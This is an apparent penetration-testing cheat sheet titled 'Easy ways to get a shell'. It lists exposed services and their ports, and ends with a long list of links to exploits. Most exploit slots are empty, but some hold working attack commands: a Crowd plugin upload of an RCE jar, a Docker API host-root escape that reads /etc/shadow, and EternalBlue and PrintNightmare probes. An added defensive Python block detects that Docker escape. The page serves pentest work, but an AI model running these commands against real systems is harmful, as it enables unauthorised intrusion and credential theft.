Low-Hanging Fruit

Easy ways to get a shell


Last updated 2 years ago

Services

Adobe ColdFusion BlazeDS

Ports: 8080

Exploit:

Apache Flink

Ports: 5000

Exploit:

Apache Hadoop

Ports: 8088

Exploit:

Apache Solr

Ports: 8983

Exploit:

Apache Spark

Ports: 6066

Exploit:

Atlassian Crowd

Ports: 4990

Exploit:

curl -k -H "Content-Type: multipart/mixed" \
  --form "file_cdl=@rce.jar" http://[HOST]:4990/crowd/admin/uploadplugin.action

Cisco Smart Install

Ports: 4786

Exploit:

Cisco Unified Communications Manager

Ports: 6970

Exploit:

curl http://[CUCM IP Address]:6970/ConfigFileCacheList.txt

Dameware

Ports: 6129

Exploit:

Dell iDrac

Ports: 443

Exploit:

Docker API

Ports: 2375

Exploit:

docker -H [host]:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
  • File Access: cat /mnt/etc/shadow
  • Remote Code Execution: chroot /mnt
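Added example (not part of the original page): detection logic, written from the defender's side, that reads the JSON `docker inspect` prints and flags any container created with the escape pattern shown above (privileged, host network, host root bind-mounted into the container). The container records below are constructed, not captured from a real host.

```python
import json

# Constructed sample in the shape of `docker inspect` output (not captured from a
# real host); only the fields this check reads are included.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/escape", "HostConfig": {
        "Privileged": True, "NetworkMode": "host", "Binds": ["/:/mnt"]}},
    {"Name": "/web", "HostConfig": {
        "Privileged": False, "NetworkMode": "bridge",
        "Binds": ["/srv/www:/usr/share/nginx/html:ro"]}},
])


def host_root_binds(binds):
    """Return the bind entries whose host-side source is '/' (the whole host filesystem)."""
    return [b for b in (binds or []) if b.split(":", 1)[0] == "/"]


def assess_container(container):
    """Classify one container record; 'escape_pattern' means the privileged
    plus host-root-bind combination used by the docker one-liner above."""
    hc = container.get("HostConfig", {})
    findings = []
    if hc.get("Privileged"):
        findings.append("privileged")
    if hc.get("NetworkMode") == "host":
        findings.append("host-network")
    if host_root_binds(hc.get("Binds")):
        findings.append("host-root-bind")
    return {
        "name": container.get("Name"),
        "findings": findings,
        "escape_pattern": {"privileged", "host-root-bind"} <= set(findings),
    }


def assess(inspect_json):
    """Run the check over the JSON array that `docker inspect` prints."""
    return [assess_container(c) for c in json.loads(inspect_json)]


if __name__ == "__main__":
    for result in assess(SAMPLE_INSPECT):
        print(result)
```

On a real host, feed it the output of `docker inspect $(docker ps -aq)`; a hit is worth pairing with a check of whether the daemon was reachable on an unauthenticated TCP port such as 2375, since that is all the one-liner above needs.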

GlassFish

Ports: 4848

Exploit:

Hashicorp Consul

Ports: 8500

Exploit:

HP Data Protector

Ports: 5555, 5556

Exploit:

HP iLO

Ports: 80, 443

Exploit:

IBM Websphere

Ports: 8880

Exploit:

IPMI

Ports: 623

Exploit:

Java RMI

Ports: 1090, 1098, 1099, 4444, 11099, 47001, 47002, 10999

Exploit:

JBoss

Ports: 4444, 4445, 11111

Exploit:

JDWP

Ports: 5005-5009, 45000, 45001

Exploit:

JMX

Ports: 8686, 9012, 50500

Exploit:

MS17-010: Eternal Blue

Ports: 139, 445

Exploit:

nmap -Pn -sV --script smb-vuln-ms17-010 -p139,445 $ip

Portainer

Ports: 9000

Exploit:

PrintNightmare

Exploit:

crackmapexec smb $host_file -u $username -p $password -M spooler

Redis

Ports: 6379

Exploit:

SAP

Ports: 3300

Exploit:

WebLogic

Ports: 7000-7004, 7070, 7071, 8000-8003, 9000-9003, 9503

Exploit:

Zoho Manageengine Desktop

Ports: 8383

Exploit:

References

Adobe ColdFusion BlazeDS Java Object Deserialization RCE
Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code Execution (Exploit Database)
Apache Flink JAR Upload Java Code Execution (Rapid7)
Apache Flink JobManager Traversal (Rapid7)
Apache Flink 1.9.x - File Upload RCE (Unauthenticated) (Exploit Database)
Hadoop YARN ResourceManager Unauthenticated Command Execution (Rapid7)
vulhub/exploit.py at master · vulhub/vulhub (GitHub)
jas502n/solr_rce: Apache Solr RCE via Velocity template (GitHub)
Imanfeng/Apache-Solr-RCE: Apache Solr Exploits (GitHub)
ivanitlearning/CVE-2018-11770: Python RCE exploit for Apache Spark rewritten from Metasploit module (GitHub)
Apache Spark Unauthenticated Command Execution (Rapid7)
Atlassian Crowd pdkinstall Remote Code Execution (Packet Storm)
Identify Cisco Smart Install endpoints (Rapid7)
frostbits-security/SIET: Smart Install Exploitation Tool (GitHub)
trustedsec/SeeYouCM-Thief (GitHub)
SolarWinds Dameware Mini Remote Control Unauthenticated RCE (Tenable)
poc/dwrcs_dwDrvInst_rce.py at master · tenable/poc (GitHub)
Dell iDRAC Default Login (Rapid7)
Path Traversal in Oracle GlassFish Server Open Source Edition (Rapid7)
Hashicorp Consul Remote Command Execution via Services API (Rapid7)
HP Data Protector EXEC_INTEGUTIL Remote Code Execution (Rapid7)
HP Data Protector 8.10 Remote Command Execution (Rapid7)
CVE-2017-12542/exploit_1.py at master · skelsec/CVE-2017-12542 (GitHub)
IBM WebSphere RCE Java Deserialization Vulnerability (Rapid7)
IPMI Information Discovery (Rapid7)
IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval (Rapid7)
IPMI 2.0 Cipher Zero Authentication Bypass Scanner (Rapid7)
Java RMI Server Insecure Default Configuration Java Code Execution (Rapid7)
Java RMI for pentesters: structure, recon and communication (non-JMX Registries) (Medium)
Java RMI for pentesters part two: reconnaissance & attack against non-JMX registries (Medium)
JBoss Vulnerability Scanner (Rapid7)
joaomatosf/jexboss: JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool (GitHub)
Java Debug Wire Protocol Remote Code Execution (Rapid7)
IOActive/jdwp-shellifier (GitHub)
Java JMX Server Insecure Configuration Java Code Execution (Rapid7)
MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption (Rapid7)
MauroEldritch/PAZUZU: PAZUZU (Portainer Authentication Zap Using Zero Utilities) is a ruby exploit for vulnerable Portainer instances (--no-auth). Featured @ DevFest Siberia 2018. (GitHub)
MauroEldritch/lempo: LEMPO (Ldap Exposure on POrtainer) is an exploit for CVE-2018-19466 (LDAP Credentials Disclosure on Portainer). Featured @ DevFest Siberia 2018 (GitHub)
cube0x0/CVE-2021-1675: C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527 (GitHub)
Redis Replication Code Execution (Rapid7)
Redis Unauthenticated Code Execution (Rapid7)
chipik/SAP_GW_RCE_exploit: SAP Gateway RCE exploits (GitHub)
Offensive Security's Exploit Database Archive
https://srcincite.io/pocs/src-2020-0011.py.txt
trustedsec/spoonmap (GitHub)